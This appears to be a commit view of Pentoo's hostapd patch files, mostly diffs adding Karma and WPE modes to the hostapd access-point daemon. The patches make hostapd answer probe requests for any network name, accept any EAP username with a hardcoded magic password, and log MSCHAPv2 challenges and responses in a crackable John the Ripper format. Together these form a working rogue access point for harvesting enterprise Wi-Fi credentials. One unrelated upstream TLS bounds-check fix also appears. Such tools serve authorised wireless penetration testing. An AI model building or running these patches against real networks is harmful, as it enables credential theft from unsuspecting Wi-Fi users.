-eap_server=0
+eap_server=1
# Path for EAP server user database
# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db"
@@ -645,20 +647,20 @@
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/gd-bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
-#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
-#private_key_passwd=secret passphrase
+private_key_passwd=TopSecretFoofusPassword
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -923,7 +925,7 @@
# and/or WPA2 (full IEEE 802.11i/RSN):
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -953,7 +955,7 @@
# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
-#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-2.0.orig/hostapd/main.c hostapd-2.0/hostapd/main.c
--- hostapd-2.0.orig/hostapd/main.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/main.c 2013-05-27 11:29:45.327484679 +0800
@@ -34,6 +34,10 @@
extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -478,7 +482,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] <configuration file(s)>\n"
"\n"
@@ -494,7 +498,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes\n"
+ " -A [karma] log all authentication attempts\n");
exit(1);
}
@@ -556,7 +562,7 @@
interfaces.global_ctrl_sock = -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tvg:");
+ c = getopt(argc, argv, "Bde:f:hKP:tvg:RA");
if (c < 0)
break;
switch (c) {
@@ -594,7 +600,12 @@
case 'g':
hostapd_get_global_ctrl_iface(&interfaces, optarg);
break;
-
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
default:
usage();
break;
diff -urN hostapd-2.0.orig/hostapd/Makefile hostapd-2.0/hostapd/Makefile
--- hostapd-2.0.orig/hostapd/Makefile 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/Makefile 2013-05-27 11:23:46.161485665 +0800
@@ -96,6 +96,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-2.0.orig/src/ap/beacon.c hostapd-2.0/src/ap/beacon.c
--- hostapd-2.0.orig/src/ap/beacon.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/beacon.c 2013-05-27 12:05:51.007478734 +0800
@@ -35,6 +35,7 @@
#include "beacon.h"
#include "hs20.h"
+#include "karma/karma.h"
#ifdef NEED_AP_MLME
@@ -442,6 +443,20 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
} else {
+
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+ karma_logger(0, message);
+ free(message);
+ os_memcpy(hapd->conf->ssid.ssid, elems.ssid, elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, elems.ssid,
diff -urN hostapd-2.0.orig/src/ap/hostapd.c hostapd-2.0/src/ap/hostapd.c
--- hostapd-2.0.orig/src/ap/hostapd.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/hostapd.c 2013-05-27 11:23:46.163485665 +0800
@@ -41,6 +41,7 @@
extern int wpa_debug_level;
extern struct wpa_driver_ops *wpa_drivers[];
+#include "karma/karma.h"
int hostapd_for_each_interface(struct hapd_interfaces *interfaces,
int (*cb)(struct hostapd_iface *iface,
diff -urN hostapd-2.0.orig/src/ap/ieee802_11.c hostapd-2.0/src/ap/ieee802_11.c
--- hostapd-2.0.orig/src/ap/ieee802_11.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_11.c 2013-05-27 11:23:46.164485665 +0800
@@ -37,6 +37,7 @@
#include "wnm_ap.h"
#include "ieee802_11.h"
+#include "karma/karma.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -698,8 +699,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-2.0.orig/src/eap_server/eap_server.c hostapd-2.0/src/eap_server/eap_server.c
--- hostapd-2.0.orig/src/eap_server/eap_server.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eap_server/eap_server.c 2013-05-27 11:23:46.165485665 +0800
@@ -19,6 +19,8 @@
#include "state_machine.h"
#include "common/wpa_ctrl.h"
+#include "karma/karma.h"
+
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
@@ -94,10 +96,8 @@
int phase2)
{
struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ char *username = NULL;
+ char *message = NULL;
eap_user_free(sm->user);
sm->user = NULL;
@@ -106,11 +106,39 @@
if (user == NULL)
return -1;
+ /* Karma EAP Modifications */
+ if (karma_eap_auth) {
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+ //wpa_printf(MSG_ERROR, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod);
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
return -1;
}
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-2.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-2.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.0.orig/src/eap_server/eap_server_mschapv2.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eap_server/eap_server_mschapv2.c 2013-05-27 11:23:46.166485665 +0800
@@ -13,6 +13,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "karma/karma.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -284,13 +285,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -330,6 +333,37 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth) {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-2.0.orig/src/karma/karma.c hostapd-2.0/src/karma/karma.c
--- hostapd-2.0.orig/src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.c 2013-05-27 11:23:46.166485665 +0800
@@ -0,0 +1,44 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-2.0.orig/src/karma/karma.d hostapd-2.0/src/karma/karma.d
--- hostapd-2.0.orig/src/karma/karma.d 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.d 2013-05-27 11:23:46.167485665 +0800
@@ -0,0 +1,4 @@
+../src/karma/karma.o: ../src/karma/karma.c ../src/utils/common.h \
+ ../src/utils/os.h ../src/utils/wpa_debug.h ../src/utils/wpabuf.h \
+ ../src/utils/includes.h ../src/utils/build_config.h ../src/utils/trace.h \
+ ../src/karma/karma.h
diff -urN hostapd-2.0.orig/src/karma/karma.h hostapd-2.0/src/karma/karma.h
--- hostapd-2.0.orig/src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.h 2013-05-27 11:23:46.167485665 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);

1161
net-wireless/hostapd/files/hostapd-2.0-karma_cli.patch
View file

File diff suppressed because it is too large Load diff

48
net-wireless/hostapd/files/hostapd-2.0-tls_length_fix.patch
View file

@ -1,48 +0,0 @@
From 586c446e0ff42ae00315b014924ec669023bd8de Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 7 Oct 2012 20:06:29 +0300
Subject: [PATCH] EAP-TLS server: Fix TLS Message Length validation
EAP-TLS/PEAP/TTLS/FAST server implementation did not validate TLS
Message Length value properly and could end up trying to store more
information into the message buffer than the allocated size if the first
fragment is longer than the indicated size. This could result in hostapd
process terminating in wpabuf length validation. Fix this by rejecting
messages that have invalid TLS Message Length value.
This would affect cases that use the internal EAP authentication server
in hostapd either directly with IEEE 802.1X or when using hostapd as a
RADIUS authentication server and when receiving an incorrectly
constructed EAP-TLS message. Cases where hostapd uses an external
authentication are not affected.
Thanks to Timo Warns for finding and reporting this issue.
Signed-hostap: Jouni Malinen <j@w1.fi>
intended-for: hostap-1
---
src/eap_server/eap_server_tls_common.c | 8 ++++++++
1 files changed, 8 insertions(+), 0 deletions(-)
diff --git a/src/eap_server/eap_server_tls_common.c b/src/eap_server/eap_server_tls_common.c
index 31be2ec..46f282b 100644
--- a/src/eap_server/eap_server_tls_common.c
+++ b/src/eap_server/eap_server_tls_common.c
@@ -228,6 +228,14 @@ static int eap_server_tls_process_fragment(struct eap_ssl_data *data,
return -1;
}
+ if (len > message_length) {
+ wpa_printf(MSG_INFO, "SSL: Too much data (%d bytes) in "
+ "first fragment of frame (TLS Message "
+ "Length %d bytes)",
+ (int) len, (int) message_length);
+ return -1;
+ }
+
data->tls_in = wpabuf_alloc(message_length);
if (data->tls_in == NULL) {
wpa_printf(MSG_DEBUG, "SSL: No memory for message");
--
1.7.4-rc1

157
net-wireless/hostapd/files/hostapd-2.0-wpe_karma.patch
View file

@ -1,157 +0,0 @@
diff -urN hostapd-1.0.orig/hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig/hostapd/main.c 2013-05-01 22:58:03.007738503 +0800
+++ hostapd-1.0/hostapd/main.c 2013-05-01 22:49:55.000000000 +0800
@@ -512,7 +512,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.c hostapd-1.0/src/crypto/ms_funcs.c
--- hostapd-1.0.orig/src/crypto/ms_funcs.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.c 2013-05-01 22:49:55.000000000 +0800
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.h hostapd-1.0/src/crypto/ms_funcs.h
--- hostapd-1.0.orig/src/crypto/ms_funcs.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.h 2013-05-01 22:49:55.000000000 +0800
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -urN hostapd-1.0.orig/src/crypto/tls_openssl.c hostapd-1.0/src/crypto/tls_openssl.c
--- hostapd-1.0.orig/src/crypto/tls_openssl.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/tls_openssl.c 2013-05-01 22:49:55.000000000 +0800
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig/src/eap_server/eap_server.c 2013-05-01 22:58:03.010738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2013-05-01 22:54:51.000000000 +0800
@@ -102,8 +102,9 @@
int phase2)
{
struct eap_user *user;
- char *username = NULL;
- char *message = NULL;
+ char *username = NULL;
+ char *message = NULL;
+ char ident = 't';
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,6 +113,11 @@
if (user == NULL)
return -1;
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
/* Karma EAP Modifications */
if (karma_eap_auth) {
/* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_fast.c hostapd-1.0/src/eap_server/eap_server_fast.c
--- hostapd-1.0.orig/src/eap_server/eap_server_fast.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_fast.c 2013-05-01 22:49:55.000000000 +0800
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:58:03.011738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:56:30.000000000 +0800
@@ -295,9 +295,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res, x;
char *auth_creds = NULL;
int auth_creds_len = 0;
@@ -338,6 +339,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
@@ -524,8 +541,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {

153
net-wireless/hostapd/files/hostapd-2.0-wpe_karma_cli.patch
View file

@ -1,153 +0,0 @@
diff -uNr hostapd-1.0/hostapd/main.c hostapd-1.0-wpe/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/hostapd/main.c 2012-08-20 22:56:17.420486344 -0400
@@ -508,7 +508,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -uNr hostapd-1.0/src/crypto/ms_funcs.c hostapd-1.0-wpe/src/crypto/ms_funcs.c
--- hostapd-1.0/src/crypto/ms_funcs.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.c 2012-08-20 22:27:09.583819291 -0400
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -uNr hostapd-1.0/src/crypto/ms_funcs.h hostapd-1.0-wpe/src/crypto/ms_funcs.h
--- hostapd-1.0/src/crypto/ms_funcs.h 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.h 2012-08-20 22:27:09.583819291 -0400
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -uNr hostapd-1.0/src/crypto/tls_openssl.c hostapd-1.0-wpe/src/crypto/tls_openssl.c
--- hostapd-1.0/src/crypto/tls_openssl.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/tls_openssl.c 2012-08-20 22:27:09.583819291 -0400
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -uNr hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-wpe/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server.c 2012-08-20 22:27:09.583819291 -0400
@@ -100,6 +100,7 @@
int phase2)
{
struct eap_user *user;
+ char ident = 't';
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
@@ -111,7 +112,10 @@
user = os_zalloc(sizeof(*user));
if (user == NULL)
return -1;
-
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -uNr hostapd-1.0/src/eap_server/eap_server_fast.c hostapd-1.0-wpe/src/eap_server/eap_server_fast.c
--- hostapd-1.0/src/eap_server/eap_server_fast.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_fast.c 2012-08-20 22:27:09.583819291 -0400
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -uNr hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c 2012-08-20 22:27:09.583819291 -0400
@@ -294,9 +294,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res,x;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +336,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
@@ -490,8 +507,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
